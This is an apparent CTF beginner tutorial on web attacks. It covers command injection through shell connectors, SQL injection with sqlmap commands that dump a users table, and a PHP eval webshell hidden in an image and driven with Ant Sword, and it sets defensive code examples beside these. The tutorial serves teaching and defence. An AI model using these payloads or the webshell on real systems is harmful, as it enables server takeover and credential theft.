CTF: A true zero-based introduction to the Web

Table of contents

Pre-knowledge map
  TCP/IP architecture (IP and ports): what an IP address is; intranet vs public IP; what a port is
  HTTP protocol: B/S architecture; request message and methods; request headers; response message; status codes

Common web vulnerabilities
  Command execution: command connectors; common cmd commands; defence levels low / medium / high / impossible
  SQL injection: what it is; how to query; how to detect and inject; sqlmap; how to defend
  Webshells: one-sentence Trojan; Ant Sword; file-upload defences

Using Kali: Metasploit (EternalBlue example)


Pre-knowledge map:

TCP/IP architecture (IP and ports):

What is an IP address: the unique identifier (think of coordinates or a code name) of a computer on the Internet, used to locate that computer.

When visiting a website, the domain name is first resolved to an IP address through DNS (the Domain Name System).

So the precondition for two hosts to talk is that each can find the other's IP address.

Intranet (LAN) IP and public network (Internet) IP:

Intranet IP: hosts inside the router's network can reach the Internet, but the Internet cannot reach them directly (port mapping, also called port forwarding, must be configured on the router).

How to determine whether your computer is on the internal network or the public network:

--Run ipconfig (Windows) or ifconfig / ip addr (Linux, macOS) on the local command line to view the IP address

--If a router is used, check the WAN (external) IP in the router management interface

--Search "IP" on Baidu (or any "what is my IP" service) and compare the address it shows with the one obtained from the local computer (or router)

--If the two differ, the local address is an intranet IP: the current connection reaches the Internet through NAT.

Public IP: an Internet-routable IP address.

It can be reached directly from Internet resources without port mapping. Everyday uses include remote camera monitoring, remote power-on (Wake-on-LAN), console game interconnection, NAS access, etc.

An IP address is like a home address. The public IP is the address of the residential compound, and there are many households inside; the intranet IP is your own house number. You can leave the compound freely (the intranet can reach the Internet), but outsiders cannot walk into your home without passing the gate (the public network cannot reach the intranet directly).
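The "compare your local address with the address the outside world sees" check above can be automated. The script below is an added example, not code from the original post: it classifies an IPv4 address against the reserved ranges (RFC 1918 private, RFC 6598 carrier-grade NAT, loopback, link-local) and then applies the tutorial's comparison. The sample addresses at the bottom are constructed, and 203.0.113.0/24 is a documentation range standing in for a real public address.

```python
import ipaddress

# Address ranges that are never routable on the public Internet. A local
# address in one of these means the machine sits behind NAT.
NON_PUBLIC_RANGES = [
    ("loopback", ipaddress.ip_network("127.0.0.0/8")),
    ("private (RFC 1918)", ipaddress.ip_network("10.0.0.0/8")),
    ("private (RFC 1918)", ipaddress.ip_network("172.16.0.0/12")),
    ("private (RFC 1918)", ipaddress.ip_network("192.168.0.0/16")),
    ("shared / CGNAT (RFC 6598)", ipaddress.ip_network("100.64.0.0/10")),
    ("link-local (RFC 3927)", ipaddress.ip_network("169.254.0.0/16")),
]


def classify(ip_text):
    """Return a label describing where an IPv4 address lives."""
    ip = ipaddress.ip_address(ip_text)
    if ip.version != 4:
        return "ipv6 (not handled here)"
    for label, net in NON_PUBLIC_RANGES:
        if ip in net:
            return label
    return "public"


def nat_verdict(local_ip, external_ip):
    """The tutorial's check: compare the address the OS reports (ipconfig/ifconfig)
    with the address an outside service sees."""
    local_kind = classify(local_ip)
    if local_kind == "public" and local_ip == external_ip:
        return "directly on the public Internet"
    if local_kind == "public":
        return "public address, but traffic leaves via a different address (proxy or VPN?)"
    # CGNAT is the case the naive "search my IP" check misses: the router's WAN
    # side is itself a 100.64.0.0/10 address, so even the router is not reachable.
    return f"behind NAT: local address is {local_kind}, public side is {external_ip}"


if __name__ == "__main__":
    # Constructed sample values, not real measurements.
    print(nat_verdict("192.168.1.23", "203.0.113.7"))
    print(nat_verdict("203.0.113.7", "203.0.113.7"))
    print(nat_verdict("100.64.3.9", "203.0.113.7"))
```

The explicit range table is used instead of Python's ipaddress.is_private because the latter does not treat the CGNAT block as private, and that is precisely the case where the router's own WAN address is still not a public one.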

What is a port: the unique identifier of an application (service) within a computer.

The word "port" can be understood as the outlet through which a device communicates with the outside world.

Ports can be divided into virtual ports and physical ports. Virtual ports are the numbered ports inside a computer, switch or router and are not visible; physical ports are the sockets a cable plugs into.

Ports are identified by numbers. (A web server usually listens on port 80 for HTTP and 443 for HTTPS.)

The source port on the client side is chosen at random from an ephemeral range; the destination port on the server side is fixed so that the server can listen on it. Valid port numbers run from 0 to 65535.

HTTP protocol - the basis for website access:

BS architecture: Browser---Send request--->Server---Response--->Browser

What is the HTTP protocol: Hypertext Transfer Protocol

The transfer protocol defines the format of the data exchanged between the browser and the server (a single agreed standard).

Process: The browser requests the server request message ----> the server responds to the request response message

Features:

--Runs on top of TCP/IP

--The default port is 80 (can be changed; HTTPS uses 443)

--Requests and responses correspond one to one

--Each request is independent of the others: HTTP is a stateless protocol. The server does not remember earlier requests by itself, so login state is carried in a cookie sent with every request, which is why obtaining someone's cookie (as in the sqlmap section below) is as good as obtaining their login.

Request message:

Request line: method, URL and protocol version. URL stands for Uniform Resource Locator, a URI (Uniform Resource Identifier) that also says where the resource can be fetched.

Request headers: key/value lines describing the request and the requesting party (Host, User-Agent, Cookie, Content-Type, ...)

Request blank line: required; this empty line is the fixed separator between the headers and the body

Request body: empty for a GET request; carries the parameters of a POST request

HTTP/1.1 defines eight request methods (GET, HEAD, POST, PUT, DELETE, CONNECT, OPTIONS, TRACE); GET and POST are the ones used most.

GET request: the parameters are in the URL, and URLs have a practical length limit (imposed by browsers and servers, not by the protocol)

POST request: the parameters are in the request body; the protocol sets no size limit, although servers usually configure one.

The difference:

--a GET parameter such as wk=111 is appended to the end of the URL after a "?"

--a POST parameter is placed in the request body

--a POST request carries an extra Content-Type header that tells the server how the body is encoded

Neither method is "safer" against injection: the server reads the parameter the same way in both cases, the attacker just places the payload in a different spot.
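To make the request layout concrete, here is an added example (not code from the original post) that parses two constructed raw HTTP/1.1 requests carrying the same parameter wk=111, once in the URL and once in the body. The parser splits at the mandatory blank line, honours Content-Length, and pulls the parameter from whichever place the method put it. The host name example.test is made up.

```python
from urllib.parse import parse_qs, urlsplit

# Two constructed raw requests: same parameter, different location.
GET_REQUEST = (
    b"GET /search?wk=111 HTTP/1.1\r\n"
    b"Host: example.test\r\n"
    b"User-Agent: demo\r\n"
    b"\r\n"
)
POST_REQUEST = (
    b"POST /search HTTP/1.1\r\n"
    b"Host: example.test\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Content-Length: 6\r\n"
    b"\r\n"
    b"wk=111"
)


def parse_request(raw):
    """Split a raw request into method, path, headers and body, then collect the
    parameters from the query string (GET) and/or the form body (POST)."""
    head, _, body = raw.partition(b"\r\n\r\n")      # the blank line ends the headers
    lines = head.decode("iso-8859-1").split("\r\n")
    method, target, version = lines[0].split(" ")  # request line
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    # Only Content-Length bytes belong to this request; anything after that is
    # the next request on the connection, not part of this body.
    length = int(headers.get("content-length", "0"))
    body = body[:length]
    parts = urlsplit(target)
    params = parse_qs(parts.query)                 # GET: parameters after the "?"
    if headers.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        params.update(parse_qs(body.decode("iso-8859-1")))  # POST: parameters in the body
    return {"method": method, "path": parts.path, "version": version,
            "headers": headers, "body": body, "params": params}


if __name__ == "__main__":
    for raw in (GET_REQUEST, POST_REQUEST):
        req = parse_request(raw)
        print(req["method"], req["path"], req["params"], req["headers"].get("content-type"))
```

Note that the parsed params dictionary is identical for both requests; a server-side handler that reads "wk" cannot tell where it came from, which is why filtering only the query string never protects a POST form.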

Request header analysis: the headers worth reading first are Host (which site is asked for), User-Agent (which client), Cookie (the session identity) and Content-Type / Content-Length (how the body is encoded and how long it is).

Response message: a status line (protocol version, status code, reason phrase), the response headers, a blank line, then the response body (HTML, JSON, a file, ...).

Response status code: 2xx success (200 OK), 3xx redirection (301, 302), 4xx client error (403 Forbidden, 404 Not Found), 5xx server error (500 Internal Server Error).

Common web vulnerabilities:

---SQL injection ---XSS ---File upload ---Deserialization ---File inclusion ---CSRF

---Command execution ---Information leakage ---XXE ---SSRF ---Unauthorized access

SQL injection: leaks or damages the database, which may hold sensitive information such as account passwords.

File upload: uploading backdoors and Trojans to the website, compromising the site and possibly the whole system

Command execution: obtaining the ability to run commands on the target machine, executing arbitrary commands to damage or control the victim

Command execution: this vulnerability usually arises because the application deliberately offers users an interface that runs a command remotely. For example, the web management interfaces of routers, firewalls, intrusion detection systems and similar equipment commonly provide a web page for a ping operation: the user enters a target IP, the back end pings it and returns the result. If the designer did not apply strict controls when building this function, an attacker can submit a malicious command string through the same interface, have the back end execute it, and so gain control of the server.

Command connectors (shell operators; note that ";" separates commands in Linux/macOS shells but not in Windows cmd.exe):

cmd1 | cmd2 : cmd2 runs regardless of whether cmd1 succeeds; the output of cmd1 becomes the input of cmd2

cmd1 ; cmd2 : cmd2 runs regardless of whether cmd1 succeeds (Linux/macOS shells)

cmd1 & cmd2 : cmd2 runs regardless of whether cmd1 succeeds (in cmd.exe; in a Unix shell "&" also sends cmd1 to the background)

cmd1 || cmd2 : cmd2 runs only if cmd1 fails

cmd1 && cmd2 : cmd2 runs only if cmd1 succeeds

Common cmd commands (Windows; the Linux counterparts are id, ifconfig / ip addr and cat):

whoami (show the current user name)

ipconfig (show network adapter information)

shutdown -s -t 0 (shut down immediately)

net user [username] [password] /add (add a new local user with the given username and password)

type [file_name] (print the contents of the file)

cmd defense low: the target IP submitted from the form is appended to the ping command line without any filtering, so every connector in the table above works as-is.

cmd defense medium:

The most efficient method: filter the command connectors---replace these symbols with empty strings, or abort execution if the user enters them.

Defect: the blacklist does not list all five connectors, so whichever ones it leaves out can still be used.

Penetration attempt workaround:

White box testing: the source code is available, so read the filtering logic directly

Black box testing: the source code cannot be seen, so try the common command connectors one by one

cmd defense high:

Note: look carefully for developer mistakes, such as a stray space typed into the blacklist, which makes the filter remove something that is not actually the connector.

Here the filtered string is not "|" but "| " (pipe followed by a space), so a bare "|" with no space after it passes the filter.

cmd defense impossible:

Source code:

Analysis:

Typical algorithm analysis: (Organize-->Split-->Verify-->Restore): the input is split on ".", there must be exactly four pieces and every piece must be numeric, and only then is the address reassembled from those pieces and handed to ping. Nothing that is not a dotted-quad ever reaches the command line, so there is no connector left to filter.
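The four defence levels above can be reproduced side by side. The following is an added example, not the original post's or DVWA's source: it builds the ping command line the way each level would and reports whether a shell connector survives, without actually running anything (the argv list is only executed in the main block, and the -c flag assumes a Linux/macOS ping). The "high" blacklist reproduces the "| " typo described above.

```python
import subprocess

CONNECTORS = ["&&", "||", "|", "&", ";"]   # the five connectors from the table above


class Rejected(Exception):
    """Raised when input fails validation before any command is built."""


def low(target):
    # No filtering: the input is pasted straight into a shell command line.
    return "ping -c 2 " + target


def medium(target):
    # Incomplete blacklist: "|" and "&" on their own still get through.
    for bad in ["&&", ";"]:
        target = target.replace(bad, "")
    return "ping -c 2 " + target


def high(target):
    # Longer blacklist, but one entry was typed as "| " (pipe plus space),
    # so a bare "|" with no following space is not removed.
    for bad in ["&", ";", "| ", "-", "$", "(", ")", "`", "||"]:
        target = target.replace(bad, "")
    return "ping -c 2 " + target


def impossible(target):
    # Organize -> split -> verify -> restore: exactly four numeric octets, each
    # 0..255, or the request is rejected. Leading zeros are normalised away.
    octets = target.strip().split(".")
    if len(octets) != 4 or not all(o.isdigit() and 0 <= int(o) <= 255 for o in octets):
        raise Rejected(target)
    rebuilt = ".".join(str(int(o)) for o in octets)
    return ["ping", "-c", "2", rebuilt]        # argv list, never passed through a shell


def impossible_accepts(target):
    try:
        impossible(target)
        return True
    except Rejected:
        return False


def shell_would_inject(cmdline):
    """Does the built command line still contain a connector a shell would honour?"""
    return any(c in cmdline for c in CONNECTORS)


if __name__ == "__main__":
    for payload in ["127.0.0.1; id", "127.0.0.1|id", "127.0.0.1 | id", "127.0.0.1&&id"]:
        print(f"{payload!r:22} low={shell_would_inject(low(payload))} "
              f"medium={shell_would_inject(medium(payload))} "
              f"high={shell_would_inject(high(payload))} "
              f"impossible_accepts={impossible_accepts(payload)}")
    # The only variant this example ever executes: validated argv, shell=False.
    print(subprocess.run(impossible("127.0.0.1"), capture_output=True, text=True).returncode)
```

The practical lesson is in the last function: the "impossible" level is safe not because its blacklist is longer but because it never hands a string to a shell at all; validation produces an argv list, and subprocess.run with a list and no shell cannot be told to run a second command.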

SQL injection:

What is SQL injection: a vulnerability at the boundary between the application and the database. In short, SQL fragments are injected into an input string; a poorly designed program performs no checking of the characters, so the injected instructions are taken by the database server as ordinary SQL and executed, and the database is read, altered or destroyed.

What is SQL: Structured Query Language, the language used to manipulate databases

How to query data in the database: a SELECT statement names the columns, the table and a WHERE condition; the web application normally builds that statement with the user's input pasted into the condition.

How to attack:

The purpose is to change the original SQL statement written by the website developer

The source code is as follows:

How to determine whether there is a SQL vulnerability: submit a single quote (') and see whether the page errors or changes; then compare a condition that is always true (1' and '1'='1) with one that is always false (1' and '1'='2). If the two produce different pages, the input is reaching the query.

How to inject:

By changing the data after the quote and watching whether the page behaves as "true" or "false", the number of columns/fields of the original query can be found (for example ORDER BY 1, 2, 3... until the database errors).

Union query on the catalogue tables: the names of all data tables are themselves stored in a table (information_schema.tables in MySQL), which can be read the same way.

Union means a combined query: a second SELECT with the same number of columns is appended, so several tables can be queried at once and their contents appear in the original page's output.

Use sqlmap to automate attacks:

That is, type: python sqlmap.py -u "URL to be detected" --cookie="the cookie copied from the browser"

How to get the cookie:

F12--->Network--->Reload--->Select the first request--->Headers--->Request headers--->Cookie

sqlmap confirms the injection point and reports the back-end DBMS, here "MySQL"

Get the database names: python sqlmap.py -u "URL to be detected" --cookie="copied cookie" --dbs

 get:

Get the tables of the specified database: python sqlmap.py -u "URL to be detected" --cookie="copied cookie" -D <database name> --tables

Definition:

-D: specifies the database whose contents you want

--tables: list the tables in that database

get:

 There are two tables shown: guestbook and users

Get the columns of the specified table: python sqlmap.py -u "URL to be detected" --cookie="copied cookie" -D <database name> -T users --columns

get:

Get the target data:

That is, add "--dump": python sqlmap.py -u "URL to be detected" --cookie="copied cookie" -D <database name> -T users --dump

get:

Since passwords are normally stored as hashes rather than in clear text:

sqlmap offers three options: crack the hashes with a dictionary attack / show them as stored without cracking / exit

After choosing not to crack, you get the raw hashes:

How to defend:

The most effective method is to keep user input from ever being parsed as SQL: use prepared statements (parameterized queries), so the value travels separately from the statement text. Filtering input, replacing special characters with empty strings, or aborting when a SQL keyword appears are weaker fallbacks that attackers routinely bypass.

The level shown here adds "\" in front of every quote we enter, so the quote is escaped and our injected SQL no longer parses (in PHP this is what addslashes or mysqli_real_escape_string does).

Caveat: escaping only protects values that sit inside quotes. A parameter dropped into a numeric comparison (WHERE id = 1) has no quote to escape, so 1 OR 1=1 still works there.

Still filtering:
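The injection and defence steps above, as one added example that is not part of the original post. It uses Python's built-in SQLite instead of MySQL, with a constructed copy of the two tables the sqlmap run found (users and guestbook; the hash values are made up). It shows the true/false column-count probe, the UNION read of the catalogue table (sqlite_master here, information_schema.tables in MySQL), why quote escaping fails in a numeric context, and the parameterized query that fixes it.

```python
import sqlite3


def make_db():
    """Constructed in-memory database mirroring the two tables the tutorial dumps."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT, user TEXT, password TEXT);
        CREATE TABLE guestbook (comment_id INTEGER, comment TEXT, name TEXT);
        INSERT INTO users VALUES (1, 'admin', 'admin', 'admin', '5f4dcc3b5aa765d61d8327deb882cf99');
        INSERT INTO users VALUES (2, 'Gordon', 'Brown', 'gordonb', 'e99a18c4428cb38d5f260853678922e0');
        INSERT INTO guestbook VALUES (1, 'This is a test comment.', 'test');
    """)
    return db


def vulnerable_lookup(db, user_id):
    # String concatenation: the user's text becomes part of the statement.
    sql = "SELECT first_name, last_name FROM users WHERE user_id = '" + user_id + "'"
    return db.execute(sql).fetchall()


def safe_lookup(db, user_id):
    # Parameterized query: the value is bound separately and can never become SQL.
    return db.execute("SELECT first_name, last_name FROM users WHERE user_id = ?",
                      (user_id,)).fetchall()


def escaped_numeric_lookup(db, user_id):
    # Quote escaping (SQL's doubled quote; PHP's addslashes uses a backslash) only helps
    # inside a quoted string. Here the value is pasted into a numeric comparison, so
    # there is no quote to break out of and escaping changes nothing.
    user_id = user_id.replace("'", "''")
    sql = "SELECT first_name, last_name FROM users WHERE user_id = " + user_id
    return db.execute(sql).fetchall()


def probe_column_count(db, max_cols=8):
    """The true/false test: ORDER BY 1, 2, 3 ... until the database complains.
    The last number that works is the column count of the original SELECT."""
    for n in range(1, max_cols + 1):
        try:
            vulnerable_lookup(db, f"1' ORDER BY {n} -- ")
        except sqlite3.OperationalError:
            return n - 1
    return None


def union_dump_tables(db):
    """Append a second SELECT with the same column count to read the table names."""
    rows = vulnerable_lookup(
        db, "x' UNION SELECT name, type FROM sqlite_master WHERE type='table' -- ")
    return sorted(name for name, _ in rows)


if __name__ == "__main__":
    db = make_db()
    print("normal:", safe_lookup(db, "1"))
    print("1' OR '1'='1 ->", vulnerable_lookup(db, "1' OR '1'='1"))
    print("columns:", probe_column_count(db))
    print("tables:", union_dump_tables(db))
    print("escaped but numeric, 1 OR 1=1 ->", escaped_numeric_lookup(db, "1 OR 1=1"))
    print("parameterized, same payload ->", safe_lookup(db, "1' OR '1'='1"))
```

The comment marker is written as "-- " with a trailing space because MySQL requires the space; SQLite accepts it too. Everything sqlmap does in the section above is an automated, blind-tolerant version of the probe and union functions.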

 

 

Classification of webshell:

Typical one-sentence Trojan: a PHP file whose single statement passes whatever arrives in the POST parameter pass to eval, so the attacker's code runs with the web server's privileges.

After writing the Trojan, upload it to the server.

Use HackBar to send a POST body such as pass=system('command'); to run the desired command.

Tools used:

Tool download: https://github.com/AntSwordProject/AntSword-Loader

Ant Sword operation:

Right-click the blank area and choose to add data

URL: the address of the Trojan you uploaded

Password: the parameter name the one-liner reads from (the name in the brackets, pass in the example above)

After the connection test succeeds, click Add and double-click the entry to browse the files on the target's disk; the right-click menu offers many actions, including opening a terminal to run further commands.

At this point we have taken over the target system.

How to defend:

intermediate:

Solution:

advanced:

Since the source code now checks the file size and verifies that the upload really is a picture, we need a picture as cover. Merge the Trojan with a picture from cmd (copy /b picture.jpg + shell.php shell.jpg):

But the result is no longer a plain Trojan: Ant Sword cannot simply connect to it and continue, because the server serves the file as an image instead of running it as PHP.

Solution 1: get the server to execute the merged image as PHP code; then use Ant Sword to add data, with that address as the URL, and enter the password. For sites that require login, the cookie must also be given to Ant Sword.

Click Request information, enter the name (Cookie) and the value (copied by hand from the browser's F12 request headers)

It then connects.

impossible: the standard defensive implementation

The essence: the server decodes the uploaded image and re-encodes (compresses) it, so whatever Trojan we appended no longer exists after recoding.
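To see why "copy /b picture + shell" works against a size-and-type check and why recoding beats it, here is an added example (not the original post's code, and not the checker used on the page) that builds a valid 1x1 PNG in code, parses its chunk list, and checks an upload three ways: extension, real PNG structure, and data left over after the IEND chunk. It also shows the limit of merely copying chunks: a payload hidden in an ancillary tEXt chunk survives, so a defender has to drop non-critical chunks or, as the "impossible" level does, decode the pixels and re-encode.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
CRITICAL = {b"IHDR", b"PLTE", b"IDAT", b"IEND"}


def _chunk(kind, data):
    """Serialize one PNG chunk: length, type, data, CRC over type+data."""
    crc = zlib.crc32(kind + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + kind + data + struct.pack(">I", crc)


def make_png(text=None):
    """A valid 1x1 greyscale PNG built in code (constructed sample, not a real upload).
    If text is given it is stored in an ancillary tEXt chunk before IEND."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)   # 1x1, 8-bit greyscale
    idat = zlib.compress(b"\x00\x80")                     # filter byte + one pixel
    body = _chunk(b"IHDR", ihdr)
    if text is not None:
        body += _chunk(b"tEXt", b"Comment\x00" + text)
    return PNG_SIG + body + _chunk(b"IDAT", idat) + _chunk(b"IEND", b"")


def walk_png(blob):
    """Parse the chunk list; return (chunks, trailing_bytes_after_IEND)."""
    if not blob.startswith(PNG_SIG):
        raise ValueError("not a PNG: bad signature")
    pos, chunks = len(PNG_SIG), []
    while True:
        if pos + 8 > len(blob):
            raise ValueError("truncated chunk header")
        length, kind = struct.unpack(">I4s", blob[pos:pos + 8])
        end = pos + 8 + length
        if end + 4 > len(blob):
            raise ValueError(f"truncated {kind!r} chunk")
        data = blob[pos + 8:end]
        (crc,) = struct.unpack(">I", blob[end:end + 4])
        if zlib.crc32(kind + data) & 0xFFFFFFFF != crc:
            raise ValueError(f"bad CRC in {kind!r} chunk")
        chunks.append((kind, data))
        pos = end + 4
        if kind == b"IEND":
            return chunks, blob[pos:]          # copy /b appends its payload here


def rebuild_png(blob):
    """Re-emit only the parsed chunks: anything glued on after IEND is discarded."""
    chunks, _ = walk_png(blob)
    return PNG_SIG + b"".join(_chunk(k, d) for k, d in chunks)


def strip_to_critical(blob):
    """Drop ancillary chunks (tEXt, zTXt, ...) where a payload can also hide.
    A payload inside the compressed IDAT stream still needs a full decode/re-encode."""
    chunks, _ = walk_png(blob)
    return PNG_SIG + b"".join(_chunk(k, d) for k, d in chunks if k in CRITICAL)


def check_upload(filename, blob):
    """Accept only .png names whose bytes parse as PNG with nothing after IEND."""
    if not filename.lower().endswith(".png"):
        return "reject: extension"
    try:
        _, trailing = walk_png(blob)
    except ValueError as e:
        return f"reject: {e}"
    return "reject: data after IEND" if trailing else "accept"


if __name__ == "__main__":
    clean = make_png()
    glued = clean + b"<?php @eval($_POST['pass']); ?>"   # what copy /b produces
    print(check_upload("shell.png", clean), check_upload("shell.png", glued))
    print(rebuild_png(glued) == clean)
```

A real checker should also store the file under a server-generated name and serve it from a directory where PHP is never executed; structure checks alone do not stop a file-inclusion bug from running a PHP payload that survived inside the image.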

Using Kali:

Metasploit:

Since the software updates often, you can turn off the update prompt if it is a nuisance.

If the font is too small, shift+ctrl+"+" enlarges it.

Usage rules:

Example: the EternalBlue vulnerability (MS17-010, a flaw in SMBv1):

Set up:

After the attack is complete:


Source: blog.csdn.net/B_cecretary/article/details/122530332